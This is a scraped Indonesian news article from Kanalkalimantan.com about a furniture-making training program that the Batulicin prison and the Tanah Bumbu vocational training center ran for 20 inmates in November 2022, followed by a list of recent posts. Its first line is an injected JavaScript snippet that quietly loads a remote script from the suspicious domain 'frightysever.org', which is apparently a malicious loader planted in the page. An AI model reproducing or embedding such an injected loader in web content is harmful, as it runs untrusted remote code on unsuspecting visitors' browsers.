(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Disnakertrans BLK Tanbu Buka Pelatihan Meubel bagi WBP Kelas III Batulicin


KANALKALIMANTAN.COM, BATULICIN – Bekerja sama dengan UPTD Balai Latihan Kerja (BLK) Kabupaten Tanah Bumbu, Lembaga Pemasyarakatan (Lapas) Kelas III Batulicin mengadakan pembinaan kemandirian pelatihan meubel bagi Warga Binaan Pemasyarakatan (WBP).

Kegiatan dibuka langsung oleh Kepala Lapas Batulicin, Bambang Hari Widodo dengan dihadiri Kepala UPTD BLK Kabupaten Tanah Bumbu, Hamdan Rusli Habibi di Aula Lapas Kelas III Batulicin, Kamis (17/11/2022).

Kepala Lapas Batulicin, Bambang Hari Widodo mengatakan, 20 warga binaan mengikuti pelatihan selama 12 hari, mulai 17- 30 November 2022.

Pelatihan seperti ini bukan yang pertama, sebelumnya Lapas Batulicin juga mengadakan Pembinaan Kemandirian berupa Pelatihan Pengelasan kepada 20 warga binaan.

 

Baca juga  : Ibnu Sina Resmikan Jembatan Apung Pertama di Kota Banjarmasin

Dia menjelaskan, melalui pelatihan yang diberikan ini diharapkan para WBP dapat memiliki keterampilan yang dapat berguna setelah menjalani pidana sehingga mereka dapat bermanfaat serta diterima masyarakat luas.

“Semoga pelatihan kemandirian ini dapat meningkatkan skill bagi wargabinaan Lapas Batulicin, sehingga ada bekal kemandirian usai menjalani pidana di Lapas Batulicin khususnya dibidang permebelan,” ucap Bambang.

Melalui Kalapas Batulicin, Bambang Hari Widodo, Kepala Kantor Wilayah Kemenkumham Kalsel, Lilik Sujandi menyampaikan apresiasi dan ucapan terimakasih kepada Pemerintah Daerah Kabupaten Tanah Bumbu.

Terkhusus kepada jajaran Dinas Tenaga Kerja Kabupaten Tanah Bumbu dan UPTD BLK Tanah Bumbu atas sinergitas berkelanjutan dalam rangka pembinaan bagi warga binaan Lapas Batulicin.

Baca juga  : Sidang Kasus Pengalihan IUP Terdakwa Mardani Maming, Penasehat Hukum Nyatakan Nilai Pembuktian Lemah

Kepala BLK Tanah Bumbu, Hamdan, menjelaskan, pelatihan keterampilan membuat mebel kepada warga binaan Lapas Batulicin ini pihaknya menggandeng tenaga ahli dari Tanah Bumbu yang telah bersertifikasi.

“Kita juga ingin warga binaan dapat diterima di masyarakat dan bisa melanjutkan kehidupan secara normal. Dengan pembekalan dari BLK ini artinya kita menyesuaikan apapun yang dapat kami berikan sebagai bentuk dukungan Pemerintah Daerah,” ujarnya.

Alfian Restu, salah seorang warga binaan sekalig peserta dari pelatihan pembuatan meubel mengaku sangat senang bisa ikut serta dalam kegiatan ini.

“Antusias sekali saya mengikuti kegiatan ini, soalnya kegiatan ini sangat bermanfaat dan kegiatan ini belum pernah coba sebelumnya, jadi menambah ilmu juga pengalaman untuk berkelanjutan usai bebas nanti,” imbuhnya. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : cell


Desy Arfianty

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

10 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

11 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

11 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

11 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

15 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

17 jam ago

This website uses cookies.